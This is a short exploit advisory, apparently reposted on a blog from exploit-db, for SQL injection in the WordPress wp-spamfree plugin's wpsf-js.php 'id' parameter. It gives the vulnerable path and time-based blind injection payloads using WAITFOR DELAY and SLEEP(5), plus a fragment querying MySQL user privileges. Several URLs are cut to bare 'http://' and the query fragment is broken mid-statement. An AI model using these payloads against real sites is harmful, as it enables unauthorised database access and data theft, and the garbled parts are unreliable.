#Exploit Title:[ WordPress wpsf-js plugin, SQL Injection]
#Date: 2011-09-25 |
#Author: [cheki] |
#Version:[3.2.1] |
#Tested on:[linux] |
#Used: ["sqlmap"] |
#SQL Injection |
http://
/wp-content/plugins/wp-spamfree/js/wpsf-js.php?id=1
#Exploit:id=-1; WAITFOR DELAY '0:0:5';-- or id=-1 AND SLEEP(5) |
#[http:// |
#http:// |
mysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END)
#http:// |
#Home page: http://hacking.ge/
Sumber :http://www.exploit-db.com/exploits/17970/
0 komentar:
Post a Comment